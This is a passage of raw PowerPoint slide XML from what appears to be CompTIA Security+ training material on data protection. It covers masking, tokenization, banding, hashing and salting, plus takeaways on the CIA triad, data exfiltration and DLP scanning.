              <a:pathLst>
                <a:path w="6175375" h="1739265">
                  <a:moveTo>
                    <a:pt x="5885433" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="289813" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="242814" y="3794"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="198225" y="14778"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="156645" y="32356"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="118670" y="55928"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="84899" y="84899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55928" y="118670"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32356" y="156645"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14778" y="198225"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3794" y="242814"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="289813"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1449069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3794" y="1496078"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14778" y="1540672"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32356" y="1582255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="55928" y="1620229"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="84899" y="1653998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="118670" y="1682966"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="156645" y="1706535"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="198225" y="1724108"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="242814" y="1735090"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="289813" y="1738883"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5885433" y="1738883"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5932433" y="1735090"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5977022" y="1724108"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6018602" y="1706535"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6056577" y="1682966"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6090348" y="1653998"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6119319" y="1620229"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6142891" y="1582255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6160469" y="1540672"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6171453" y="1496078"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6175247" y="1449069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6175247" y="289813"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6171453" y="242814"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6160469" y="198225"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6142891" y="156645"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6119319" y="118670"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6090348" y="84899"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6056577" y="55928"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6018602" y="32356"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5977022" y="14778"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5932433" y="3794"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5885433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886188" y="6227064"/>
              <a:ext cx="3801110" cy="737870"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3801109" h="737870">
                  <a:moveTo>
                    <a:pt x="3677919" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="122935" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75062" y="9653"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35988" y="35988"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9653" y="75062"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="122936"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="614680"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9653" y="662553"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="35988" y="701627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="75062" y="727962"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="122935" y="737616"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3677919" y="737616"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3725793" y="727962"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3764867" y="701627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3791202" y="662553"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3800855" y="614680"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3800855" y="122936"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3791202" y="75062"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3764867" y="35988"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3725793" y="9653"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3677919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4102353" y="3204210"/>
            <a:ext cx="193103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45" b="1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2200" spc="-15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165" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Masking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762238" y="3233166"/>
            <a:ext cx="5776595" cy="19062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274320">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="95"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="60" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Tokenization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2530"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="110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-45">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Field</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-12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5">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>value</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-114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0">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>replaced</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-14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0">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>with</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-14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10">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-10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5">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>random</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-12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5">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>token</a:t>
            </a:r>
            <a:endParaRPr sz="20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Clr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="110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-65">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Toke</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-65">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-114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60">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-25">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>tore</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-20">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>d</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-13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5">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>in</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-12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10">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-114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60">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-10">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>eparat</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-5">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-14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5">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>data</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-13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5">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>sourc</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-30">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>e</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-12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0">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>(vau</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-35">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-55">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>t)</a:t>
            </a:r>
            <a:endParaRPr sz="20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Clr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="110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-35">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Reversible</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-14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0">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>with</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-14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5">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>access</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-12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5">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-14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0">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-12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0">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>vault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166872" y="6192011"/>
            <a:ext cx="3801110" cy="737870"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3801109" h="737870">
                <a:moveTo>
                  <a:pt x="3677920" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="122936" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="75062" y="9653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35988" y="35988"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9653" y="75062"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="122936"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="614680"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9653" y="662553"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35988" y="701627"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="75062" y="727962"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="122936" y="737615"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3677920" y="737615"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3725793" y="727962"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3764867" y="701627"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3791202" y="662553"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3800855" y="614680"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3800855" y="122936"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3791202" y="75062"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3764867" y="35988"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3725793" y="9653"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3677920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3416553" y="6396990"/>
            <a:ext cx="3300729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00" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Aggregation</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-10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80" b="1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2200" spc="-114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120" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Banding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751189" y="6473190"/>
            <a:ext cx="4707890" cy="13703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654810">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="95"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="125" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Hashing</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-9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135" b="1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200" spc="-114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85" b="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Salting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1905"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="110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-20">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>In</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-35">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>d</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-65">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>exi</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-90">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-150">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>g</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-114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5">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>method</a:t>
            </a:r>
            <a:endParaRPr sz="20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Clr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPct val="110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-65">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Dis</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-60">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-35">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>ard</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-25">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-25">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-150">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>g</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-14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5">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>ori</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-90">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>g</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-30">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-70">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-50">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-25">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-12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5">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>data</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-13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0">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>fo</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-5">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>r</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-12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5">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-80">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>d</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-35">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>entifier</a:t>
            </a:r>
            <a:endParaRPr sz="2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02508" y="1187196"/>
            <a:ext cx="3974591" cy="36575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07916" y="784098"/>
            <a:ext cx="272605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85">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Key</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-195">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="130">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Takeaways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2211323"/>
            <a:ext cx="457200" cy="4572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3962400"/>
            <a:ext cx="457200" cy="4572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5353811"/>
            <a:ext cx="457200" cy="4572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85697" y="2263119"/>
            <a:ext cx="8550275" cy="5209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100"/>
              </a:spcBef>
            </a:pP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The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value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data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information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assets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determined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by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 </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-6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impact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has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organization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when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any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threat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causes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security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concerns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Confidentiality,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Integrity,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Availability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(CIA).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200">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="116839">
              <a:lnSpc>
                <a:spcPct val="114100"/>
              </a:lnSpc>
            </a:pP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governance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policy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outlines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security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measures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will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safeguar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hroug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out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its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fe.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200">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="1049655">
              <a:lnSpc>
                <a:spcPct val="114100"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="5"/>
              </a:spcBef>
            </a:pP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Any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unauthorized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copy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retrieval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from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system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referred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as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exfiltration.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12700" marR="1240790">
              <a:lnSpc>
                <a:spcPct val="114100"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="5"/>
              </a:spcBef>
            </a:pP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DLP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products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scan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files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matched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strings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prevent </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-6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autho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ized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copyi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7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fer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6595871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0960" rIns="0" bIns="0" rtlCol="0" vert="horz">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="8333740" marR="5080" indent="-2419350">
              <a:lnSpc>
                <a:spcPts val="3020"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="480"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" spc="170"/>
              <a:t>Com</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="135"/>
              <a:t>p</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="55"/>
              <a:t>TI</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="85"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-80"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="65"/>
              <a:t>Security+</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-120"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="70"/>
